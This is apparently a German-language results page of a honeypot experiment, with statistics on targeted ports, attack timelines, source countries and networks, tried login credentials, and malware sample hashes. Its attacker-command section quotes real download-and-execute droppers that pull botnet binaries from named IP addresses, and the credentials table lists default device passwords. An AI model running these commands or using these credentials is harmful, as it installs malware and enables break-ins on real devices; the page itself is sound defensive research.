Zum Inhalt springen

Honeypot-Experiment

Ergebnisse

Statistiken aus beiden Honeypots. Zu jedem Diagramm und jeder Tabelle gibt es einen Zeitrahmen, die CSV-Quelldatei und das Skript, mit dem die Zahlen berechnet wurden – damit jeder die Zahlen nach Belieben selbst nachrechnen kann.

Daten aktualisiert: 03.10.2026 10:31:16 UTC+02:00

Problem melden

Port-Rangliste #


Haupttabelle des Experiments: Welche Ports standen bei den Angreifern am meisten im Fokus? Die Tabelle lässt sich nach einer beliebigen Spalte sortieren, nach Server filtern und nach einem bestimmten Port, einem Portbereich oder einem Dienstnamen durchsuchen. Auf jede Zeile kann verwiesen werden, zum Beispiel #port-3389.

Bei srv4 wird der tatsächliche Zielport aus hptcp berücksichtigt. Die Umleitungsports (42222, 42223, 42280, 42443) werden nicht als Zielports gezählt.
Port Protokoll Üblicher Service Server Versuche Eindeutige IP-Adresse Anteil
5901 tcp VNC beide Server 883.864 801 16,1 %
3389 tcp RDP beide Server 734.148 2.425 13,4 %
3389 tcp RDP srv4 726.599 1.515 18,1 %
5900 tcp VNC beide Server 707.172 1.343 12,9 %
445 tcp SMB beide Server 459.930 6.055 8,4 %
5901 tcp VNC srv4 449.586 598 11,2 %
5901 tcp VNC srv3 434.278 655 29,7 %
445 tcp SMB srv3 415.953 5.570 28,4 %
5900 tcp VNC srv4 360.884 1.098 9,0 %
5900 tcp VNC srv3 346.288 1.176 23,7 %
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
honeypot-ports-aggregated-20260922.csv
Skript
wird veröffentlicht
Format
Felddokumentation

Entwicklung im Zeitverlauf #


Das Ereignisvolumen im Zeitverlauf, unterteilt in Kampagnen und Hintergrundrauschen, sowie darunter die Anzahl der eindeutigen IP-Adressen. Den Logdateien der Agenten zufolge konnten die einzelnen Kampagnen den Großteil des täglichen Datenverkehrs erzeugen. Ohne diese Aufteilung würde das Diagramm ein falsches Bild vermitteln: Die Kampagne würde wie ein Trend erscheinen und ihr Ende wie ein Ausfall der Datenerfassung.

Wie genau sich die Kampagne vom Grundrauschen abhebt, wird durch das unter dem Diagramm angegebene Skript bestimmt.

Anzahl der Ereignisse

  • Grundrauschen
  • Kampagnen
0200k400k600k800k22. 8.22.08.2026 Grundrauschen: 22.460 Kampagnen: 59.843 Insgesamt: 82.303 Unvollständiger Zeitraum – Daten für 12 h / 24 h23.08.2026 Grundrauschen: 45.099 Kampagnen: 34.177 Insgesamt: 79.27624.08.2026 Grundrauschen: 38.153 Kampagnen: 10.775 Insgesamt: 48.92825. 8.25.08.2026 Grundrauschen: 40.077 Kampagnen: 29.825 Insgesamt: 69.90226.08.2026 Grundrauschen: 40.083 Kampagnen: 28.709 Insgesamt: 68.79227.08.2026 Grundrauschen: 42.664 Kampagnen: 161.642 Insgesamt: 204.30628. 8.28.08.2026 Grundrauschen: 42.779 Kampagnen: 159.044 Insgesamt: 201.82329.08.2026 Grundrauschen: 34.634 Kampagnen: 171.641 Insgesamt: 206.27530.08.2026 Grundrauschen: 37.426 Kampagnen: 148.263 Insgesamt: 185.68931. 8.31.08.2026 Grundrauschen: 35.671 Kampagnen: 504.248 Insgesamt: 539.91901.09.2026 Grundrauschen: 53.935 Kampagnen: 666.265 Insgesamt: 720.20002.09.2026 Grundrauschen: 65.803 Kampagnen: 209.955 Insgesamt: 275.7583. 9.03.09.2026 Grundrauschen: 46.703 Kampagnen: 227.972 Insgesamt: 274.67504.09.2026 Grundrauschen: 51.972 Kampagnen: 167.450 Insgesamt: 219.42205.09.2026 Grundrauschen: 58.392 Kampagnen: 95.631 Insgesamt: 154.0236. 9.06.09.2026 Grundrauschen: 85.408 Kampagnen: 46.399 Insgesamt: 131.80707.09.2026 Grundrauschen: 89.526 Kampagnen: 94.877 Insgesamt: 184.40308.09.2026 Grundrauschen: 109.966 Kampagnen: 59.781 Insgesamt: 169.7479. 9.09.09.2026 Grundrauschen: 128.711 Kampagnen: 48.861 Insgesamt: 177.57210.09.2026 Grundrauschen: 132.528 Kampagnen: 60.866 Insgesamt: 193.39411.09.2026 Grundrauschen: 147.151 Kampagnen: 63.267 Insgesamt: 210.41812. 9.12.09.2026 Grundrauschen: 171.996 Kampagnen: 82.831 Insgesamt: 254.82713.09.2026 Grundrauschen: 131.895 Kampagnen: 105.016 Insgesamt: 236.91114.09.2026 Grundrauschen: 129.805 Kampagnen: 83.835 Insgesamt: 213.64015. 9.15.09.2026 Grundrauschen: 112.933 Kampagnen: 159.141 Insgesamt: 272.07416.09.2026 Grundrauschen: 72.402 Kampagnen: 28.713 Insgesamt: 101.115 Unvollständiger Zeitraum – Daten für 12 h / 24 h

Eindeutige IP-Adressen

Anzahl der verschiedenen Quell-IP-Adressen pro Tag.

  • srv3
  • srv4
02k4k6ksrv4srv322. 8.25. 8.28. 8.31. 8.3. 9.6. 9.9. 9.12. 9.15. 9.22.08.2026 srv3: 547 srv4: 1.870 Unvollständiger Zeitraum – Daten für 12 h / 24 h23.08.2026 srv3: 1.292 srv4: 3.52924.08.2026 srv3: 1.429 srv4: 3.30925.08.2026 srv3: 1.552 srv4: 3.82426.08.2026 srv3: 1.552 srv4: 3.77527.08.2026 srv3: 1.585 srv4: 4.30128.08.2026 srv3: 1.364 srv4: 4.08329.08.2026 srv3: 1.029 srv4: 3.85330.08.2026 srv3: 975 srv4: 4.17631.08.2026 srv3: 1.488 srv4: 4.18301.09.2026 srv3: 1.573 srv4: 4.50002.09.2026 srv3: 1.859 srv4: 4.28103.09.2026 srv3: 1.621 srv4: 4.34304.09.2026 srv3: 1.628 srv4: 4.08705.09.2026 srv3: 1.535 srv4: 4.11706.09.2026 srv3: 1.637 srv4: 4.34907.09.2026 srv3: 1.494 srv4: 4.40208.09.2026 srv3: 1.758 srv4: 4.60909.09.2026 srv3: 1.733 srv4: 4.67110.09.2026 srv3: 1.818 srv4: 5.09511.09.2026 srv3: 1.747 srv4: 5.40212.09.2026 srv3: 1.859 srv4: 5.45013.09.2026 srv3: 1.854 srv4: 5.43414.09.2026 srv3: 1.994 srv4: 5.51615.09.2026 srv3: 1.884 srv4: 5.30316.09.2026 srv3: 1.386 srv4: 3.449 Unvollständiger Zeitraum – Daten für 12 h / 24 h

Einzigartige IP-Adressen lassen sich nicht über die Server hinweg zusammenzählen – dieselbe Adresse könnte beide angegriffen haben. Jeder Server hat daher eine eigene Zeile.

Abgedunkelte Spalten und leere Kreise stehen für unvollständige Zeiträume: Das Erfassungsfenster beginnt und endet um 12:00 Uhr UTC, und der durch den ausgewählten Bereich abgeschnittene Zeitraum ist kürzer als die anderen. Vergleichen Sie ihn daher nicht mit den benachbarten Zeiträumen.

Werte als Tabelle anzeigen
Tag (UTC) Ereignis Kampagnen Grundrauschen Eindeutige IP-Adresse srv3 Eindeutige IP-Adresse srv4
22.08.2026 · unvollständig 82.303 59.843 22.460 547 1.870
23.08.2026 79.276 34.177 45.099 1.292 3.529
24.08.2026 48.928 10.775 38.153 1.429 3.309
25.08.2026 69.902 29.825 40.077 1.552 3.824
26.08.2026 68.792 28.709 40.083 1.552 3.775
27.08.2026 204.306 161.642 42.664 1.585 4.301
28.08.2026 201.823 159.044 42.779 1.364 4.083
29.08.2026 206.275 171.641 34.634 1.029 3.853
30.08.2026 185.689 148.263 37.426 975 4.176
31.08.2026 539.919 504.248 35.671 1.488 4.183
01.09.2026 720.200 666.265 53.935 1.573 4.500
02.09.2026 275.758 209.955 65.803 1.859 4.281
03.09.2026 274.675 227.972 46.703 1.621 4.343
04.09.2026 219.422 167.450 51.972 1.628 4.087
05.09.2026 154.023 95.631 58.392 1.535 4.117
06.09.2026 131.807 46.399 85.408 1.637 4.349
07.09.2026 184.403 94.877 89.526 1.494 4.402
08.09.2026 169.747 59.781 109.966 1.758 4.609
09.09.2026 177.572 48.861 128.711 1.733 4.671
10.09.2026 193.394 60.866 132.528 1.818 5.095
11.09.2026 210.418 63.267 147.151 1.747 5.402
12.09.2026 254.827 82.831 171.996 1.859 5.450
13.09.2026 236.911 105.016 131.895 1.854 5.434
14.09.2026 213.640 83.835 129.805 1.994 5.516
15.09.2026 272.074 159.141 112.933 1.884 5.303
16.09.2026 · unvollständig 101.115 28.713 72.402 1.386 3.449
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
timeline-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Karte zur Herkunft der Verbindungen #


Woher die Verbindungen kamen. Das Land wird anhand der registrierten IP-Adresse bestimmt, nicht anhand des tatsächlichen Standorts des Angreifers – hinter der Adresse kann sich ein gemieteter Server oder ein infizierter Computer an einem beliebigen Ort der Welt verbergen. Die genauen Zahlen finden Sie in den folgenden Tabellen.

Die Karte wird vom Dienst Datawrapper dargestellt; beim Laden der Karte stellt der Browser eine Verbindung zu dessen Servern her. Karte separat öffnen

Geografie und Netzwerke #


Woher der Datenverkehr stammte, basierend auf der Geolokalisierung der Quell-IP-Adresse und zu welchen autonomen Systemen (ASN) die Adressen gehören. Die Geolokalisierung gibt an, wo die Adresse registriert ist, nicht, wo sich der Angreifer befindet.

Die häufigsten Länder

  1. US 37,6 %2.057.660
  2. DE 22,5 %1.230.744
  3. CN 10,2 %556.778
  4. GB 8,9 %486.870
  5. SC 3,4 %184.746
  6. NL 2,2 %120.671
  7. TN 1,8 %96.601
  8. VN 1,2 %64.512
  9. MX 1,1 %59.561
  10. IN 0,9 %49.705
  11. SG 0,9 %49.368
  12. BR 0,8 %44.530
  13. RU 0,8 %42.439
  14. HK 0,7 %38.439
  15. RO 0,7 %37.368

Die größten Netzwerke (ASN)

ASN Netzwerk Ereignis Eindeutige IP-Adresse Anteil
51167 CONTABO
DE
1.036.962 168 18,9 %
22295 ADVIN
US
924.717 7 16,9 %
36352 AS-COLOCROSSING
US
388.883 131 7,1 %
212238 CDNEXT
GB
385.498 98 7,0 %
396982 GOOGLE-CLOUD-PLATFORM
US
171.392 3.170 3,1 %
14061 DIGITALOCEAN-ASN
US
138.119 2.732 2,5 %
45090 TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited
CN
133.244 114 2,4 %
209334 MODAT-01
NL
114.475 93 2,1 %
197170 TECHTIES-AS - TechTies Inc.
SC
110.821 185 2,0 %
45102 ALIBABA-CN-NET Alibaba US Technology Co., Ltd.
CN
101.319 303 1,8 %
Werte als Tabelle anzeigen
Land Ereignis Eindeutige IP-Adresse Anteil
US 2.057.660 13.624 37,6 %
DE 1.230.744 1.111 22,5 %
CN 556.778 5.671 10,2 %
GB 486.870 2.870 8,9 %
SC 184.746 319 3,4 %
NL 120.671 174 2,2 %
TN 96.601 94 1,8 %
VN 64.512 644 1,2 %
MX 59.561 281 1,1 %
IN 49.705 850 0,9 %
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
geo-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Anmeldedaten #


Die Kombinationen aus Benutzername und Passwort, die Angreifer ausprobiert haben, sowie die am häufigsten getesteten Benutzernamen. Die Werte werden genau so angezeigt, wie sie eingegangen sind.

Die am häufigsten getesteten Benutzernamen

  1. root 4.665 Einträge43.470
  2. admin 722 Einträge10.909
  3. enable\x00 2 Einträge2.938
  4. user 216 Einträge2.100
  5. sa 83 Einträge2.049
  6. support 178 Einträge1.551
  7. test 215 Einträge1.518
  8. ubuntu 100 Einträge1.456
  9. cloud 148 Einträge1.281
  10. postgres 93 Einträge1.198
  11. batacek 147 Einträge1.164
  12. srv 147 Einträge1.154
  13. shell\x00 1 Einträge965
  14. deploy 66 Einträge925
  15. ftp 459 Einträge876

Die häufigsten Kombinationen

Name Passwort Versuche Eindeutige IP-Adresse
root (leer) 3.084 219
admin admin 2.649 849
enable\x00 linuxshell\x00 1.955 24
admin (leer) 1.939 69
root xc3511 1.591 76
root admin 1.529 160
root vizxv 1.523 120
root 123456 1.207 142
support support 990 129
enable\x00 system\x00 983 27
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
credentials-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Was geschah nach der Anmeldung? #


Befehle, die Angreifer in der emulierten Shell eingegeben haben, sortiert nach Häufigkeit. Es handelt sich um die Eingaben des Angreifers, nicht um Code, der tatsächlich auf dem Server ausgeführt würde.

Die Originalaufzeichnung, genau so dargestellt, wie sie entstanden ist.
Befehl Anzahl Beziehungen
#!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-p.s-l.Sakura; chmod +x m-p.s-l.Sakura; ./m-p.s-l.Sakura; rm -rf m-p.s-l.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/s-h.4-.Sakura; chmod +x s-h.4-.Sakura; ./s-h.4-.Sakura; rm -rf s-h.4-.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/x-8.6-.Sakura; chmod +x x-8.6-.Sakura; ./x-8.6-.Sakura; rm -rf x-8.6-.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-6.Sakura; chmod +x a-r.m-6.Sakura; ./a-r.m-6.Sakura; rm -rf a-r.m-6.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/x-3.2-.Sakura; chmod +x x-3.2-.Sakura; ./x-3.2-.Sakura; rm -rf x-3.2-.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-7.Sakura; chmod +x a-r.m-7.Sakura; ./a-r.m-7.Sakura; rm -rf a-r.m-7.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/p-p.c-.Sakura; chmod +x p-p.c-.Sakura; ./p-p.c-.Sakura; rm -rf p-p.c-.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/i-5.8-6.Sakura; chmod +x i-5.8-6.Sakura; ./i-5.8-6.Sakura; rm -rf i-5.8-6.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/m-6.8-k.Sakura; chmod +x m-6.8-k.Sakura; ./m-6.8-k.Sakura; rm -rf m-6.8-k.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/p-p.c-.Sakura; chmod +x p-p.c-.Sakura; ./p-p.c-.Sakura; rm -rf p-p.c-.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-4.Sakura; chmod +x a-r.m-4.Sakura; ./a-r.m-4.Sakura; rm -rf a-r.m-4.Sakura cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.154.43.200/a-r.m-5.Sakura; chmod +x a-r.m-5.Sakura; ./a-r.m-5.Sakura; rm -rf a-r.m-5.Sakura 1 1
#!/bin/sh wget http://74.81.40.155/iran.x86_64 -O /tmp/iran.x86_64 || curl http://74.81.40.155/iran.x86_64 -o /tmp/iran.x86_64; chmod 777 /tmp/iran.x86_64; /tmp/iran.x86_64 default; wget http://74.81.40.155/iran.aarch64 -O /tmp/iran.aarch64 || curl http://74.81.40.155/iran.aarch64 -o /tmp/iran.aarch64; chmod 777 /tmp/iran.aarch64; /tmp/iran.aarch64 default; wget http://74.81.40.155/iran.m68k -O /tmp/iran.m68k || curl http://74.81.40.155/iran.m68k -o /tmp/iran.m68k; chmod 777 /tmp/iran.m68k; /tmp/iran.m68k default; wget http://74.81.40.155/iran.mips -O /tmp/iran.mips || curl http://74.81.40.155/iran.mips -o /tmp/iran.mips; chmod 777 /tmp/iran.mips; /tmp/iran.mips default; wget http://74.81.40.155/iran.mipsel -O /tmp/iran.mipsel || curl http://74.81.40.155/iran.mipsel -o /tmp/iran.mipsel; chmod 777 /tmp/iran.mipsel; /tmp/iran.mipsel default; wget http://74.81.40.155/iran.powerpc -O /tmp/iran.powerpc || curl http://74.81.40.155/iran.powerpc -o /tmp/iran.powerpc; chmod 777 /tmp/iran.powerpc; /tmp/iran.powerpc default; wget http://74.81.40.155/iran.sparc -O /tmp/iran.sparc || curl http://74.81.40.155/iran.sparc -o /tmp/iran.sparc; chmod 777 /tmp/iran.sparc; /tmp/iran.sparc default; wget http://74.81.40.155/iran.sh4 -O /tmp/iran.sh4 || curl http://74.81.40.155/iran.sh4 -o /tmp/iran.sh4; chmod 777 /tmp/iran.sh4; /tmp/iran.sh4 default; wget http://74.81.40.155/iran.arc -O /tmp/iran.arc || curl http://74.81.40.155/iran.arc -o /tmp/iran.arc; chmod 777 /tmp/iran.arc; /tmp/iran.arc default; wget http://74.81.40.155/iran.i486 -O /tmp/iran.i486 || curl http://74.81.40.155/iran.i486 -o /tmp/iran.i486; chmod 777 /tmp/iran.i486; /tmp/iran.i486 default; wget http://74.81.40.155/iran.armv4l -O /tmp/iran.armv4l || curl http://74.81.40.155/iran.armv4l -o /tmp/iran.armv4l; chmod 777 /tmp/iran.armv4l; /tmp/iran.armv4l default; wget http://74.81.40.155/iran.armv5l -O /tmp/iran.armv5l || curl http://74.81.40.155/iran.armv5l -o /tmp/iran.armv5l; chmod 777 /tmp/iran.armv5l; /tmp/iran.armv5l default; wget http://74.81.40.155/iran.armv6l -O /tmp/iran.armv6l || curl http://74.81.40.155/iran.armv6l -o /tmp/iran.armv6l; chmod 777 /tmp/iran.armv6l; /tmp/iran.armv6l default; 1 1
#!/bin/sh wget http://176.65.139.206/iran.x86_64 -O x86_64 || curl http://176.65.139.206/iran.x86_64 -o x86_64; chmod 777 x86_64; ./x86_64 catloader; wget http://176.65.139.206/iran.aarch64 -O aarch64 || curl http://176.65.139.206/iran.aarch64 -o aarch64; chmod 777 aarch64; ./aarch64catloader; wget http://176.65.139.206/iran.m68k -O m68k || curl http://176.65.139.206/iran.m68k -o m68k; chmod 777 m68k; ./m68k catloader; wget http://176.65.139.206/iran.mips -O mips || curl http://176.65.139.206/iran.mips -o mips; chmod 777 mips; ./mips catloader; wget http://176.65.139.206/iran.mipsel -O mipsel || curl http://176.65.139.206/iran.mipsel -o mipsel; chmod 777 mipsel; ./mipsel catloader; wget http://176.65.139.206/iran.powerpc -O powerpc || curl http://176.65.139.206/iran.powerpc -o powerpc; chmod 777 powerpc; ./powerpc catloader; wget http://176.65.139.206/iran.sparc -O sparc || curl http://176.65.139.206/iran.sparc -o sparc; chmod 777 sparc; ./sparc catloader; wget http://176.65.139.206/iran.sh4 -O sh4 || curl http://176.65.139.206/iran.sh4 -o sh4; chmod 777 sh4; ./sh4 catloader; wget http://176.65.139.206/iran.arc -O arc || curl http://176.65.139.206/iran.arc -o arc; chmod 777 arc; ./arc catloader; wget http://176.65.139.206/iran.i486 -O i486 || curl http://176.65.139.206/iran.i486 -o i486; chmod 777 i486; ./i486 catloader; wget http://176.65.139.206/iran.armv4l -O armv4l || curl http://176.65.139.206/iran.armv4l -o armv4l; chmod 777 armv4l; ./armv4l catloader; wget http://176.65.139.206/iran.armv5l -O armv5l || curl http://176.65.139.206/iran.armv5l -o armv5l; chmod 777 armv5l; ./armv5l catloader; wget http://176.65.139.206/iran.armv6l -O armv6l || curl http://176.65.139.206/iran.armv6l -o armv6l; chmod 777 armv6l; ./armv6l catloader; wget http://176.65.139.206/iran.armv7l -O armv7l || curl http://176.65.139.206/iran.armv7l -o armv7l; chmod 777 armv7l; ./armv7l catloader; 1 1
':"<];#=!>``` 1 1
(ftpget 77.90.185.66 f ftpget || busybox ftpget 77.90.185.66 f ftpget) > f; chmod 777 f; ./f; rm -rf f 1 1
(tftp -g 77.90.185.66 -r tftp -l- || busybox tftp -g 77.90.185.66 -r tftp -l-) > t; chmod 777 t; ./t; rm -rf t 1 1
(W=main_x86_64; M=$(uname -m 2>/dev/null); case "$M" in *aarch64*|*arm64*) W=main_arm64;; *mips*el*) W=main_mpsl;; *mips*) W=main_mips;; *armv7*|*armv6*) W=main_arm7;; *arm*) W=main_arm7;; esac); wget -qO /tmp/.pf http://pingg.sbs/$W 2>/dev/null || busybox wget -qO /tmp/.pf http://pingg.sbs/$W 2>/dev/null || curl -fsSL -o /tmp/.pf http://pingg.sbs/$W; chmod +x /tmp/.pf 2>/dev/null; /tmp/.pf $W >/dev/null 2>&1 & 1 1
(wget http://77.90.185.66/wget -O- || busybox wget http://77.90.185.66/wget -O-) > w; chmod 777 w; ./w; rm -rf w 1 1
/bin/busybox cat /proc/mounts; /bin/busybox htm6BVA6 1 1
/bin/busybox cat /proc/mounts; /bin/busybox jVQTSekR 1 1
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
attacker-commands-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Entnommene Proben #


Dateien, die Angreifer je nach Typ und Architektur herunterzuladen oder hochzuladen versucht haben.

Hier gibt es nur Hashes und Metadaten. Die Samples selbst befinden sich in einem passwortgeschützten Archiv im Bereich Daten

Nach Dateityp

  1. PE1.058
  2. ELF58
  3. script39
  4. data35

Nach Architektur

  1. —1.132
  2. x86_6424
  3. arm11
  4. x864
  5. mips4
  6. mipsel4
  7. aarch643
  8. riscv2
  9. elf-0x5d2
  10. sh1
  11. elf-0x41
  12. ppc1
  13. sparc1
SHA-256 Typ Architektur Größe Zum ersten Mal Aufgenommen Suchen
87adc00cc7aa18d84c0b047bc186b34e48715b89f8d2f40278f7eb3a01d05223 PE — 5,0 MB 16.09.2026 16:07:27 UTC 0 VirusTotal
556ee9f8e72a1227ba78be3a191e1292cf80583662feaa6076594ce735add52c PE — 5,0 MB 16.09.2026 16:29:11 UTC 0 VirusTotal
7a249a6470918e47a1b52977ffc2647f509b743577a9d08a7eca97d92fefd3e2 PE — 5,0 MB 16.09.2026 16:43:57 UTC 0 VirusTotal
b4bdea26eaaeb90ebc546cbcb8f5d7094e6e4cb603852373d3c0960e7d11b81d PE — 5,0 MB 16.09.2026 17:20:47 UTC 0 VirusTotal
816d74c4e22f2960b7c65cd43fc5439e6794f7364057cd7ba790395d1fe9b6a7 PE — 5,0 MB 16.09.2026 17:32:38 UTC 0 VirusTotal
537f0aca0b2951c929f8442d96fdcb98730a5d8d1c2f8f3676213e72e7056e33 PE — 5,0 MB 16.09.2026 17:50:59 UTC 0 VirusTotal
b9318a1bebca4d2d3066cf32a7a44008b3f79347499c60204130c3e584dfebde PE — 5,0 MB 16.09.2026 18:14:39 UTC 0 VirusTotal
daddeeb978989f4fec6baef6591ea4914f2d2aae464b79cfcf49303f58234caa PE — 5,0 MB 16.09.2026 18:29:35 UTC 0 VirusTotal
a08e56df07fb449d8ad53d7ceb65e01aa884a42dfea52b1b06f3fb869203cee4 PE — 5,0 MB 16.09.2026 18:30:52 UTC 0 VirusTotal
60ce05881f1ec405ceaccdfeb15c700f0bda7e9f4912d49cd3e9b52d182a3b2f PE — 5,0 MB 16.09.2026 18:32:03 UTC 0 VirusTotal
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
samples-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation

Serververgleich #


Wie viel mehr Traffic hat die größere Fläche gebracht und worin unterscheiden sich die beiden Server hinsichtlich ihrer Struktur?

Die absoluten Zahlen beider Server sind nicht vergleichbar, da srv4 eine um ein Vielfaches größere Fläche bot. Es ist sinnvoll, die Struktur und die Reihenfolge zu vergleichen, nicht die Größe. Mehr
Zeiger srv3 srv4 srv4 / srv3
Verbindungsversuche (Port-Rangliste) 1.462.877 4.014.322 2,7×
Betroffene Ports 45 58.628 1.302,8×
Ereignisse (Entwicklung im Zeitverlauf) 1.462.877 4.014.322 2,7×

srv3 die häufigsten Ports

  1. 5901/tcp VNC434.278
  2. 445/tcp SMB415.953
  3. 5900/tcp VNC346.288
  4. 22/tcp SSH77.679
  5. 443/tcp HTTPS25.880
  6. 23/tcp Telnet24.961
  7. 5060/udp SIP22.484
  8. 80/tcp HTTP18.336
  9. 3000/tcp HTTP alt9.322
  10. 3389/tcp RDP7.549

srv4 die häufigsten Ports

  1. 3389/tcp RDP726.599
  2. 5901/tcp VNC449.586
  3. 5900/tcp VNC360.884
  4. 1256/tcp341.276
  5. 8787/tcp340.499
  6. 8082/tcp HTTP alt323.345
  7. 1080/tcp SOCKS270.186
  8. 5800/tcp VNC HTTP159.507
  9. 22/tcp SSH61.829
  10. 445/tcp SMB43.977
Zeitfenster
21.08.2026 – 16.09.2026
Quelldaten
honeypot-ports-aggregated-20260922.csv, timeline-aggregated derzeit nicht verfügbar
Skript
wird veröffentlicht
Format
Felddokumentation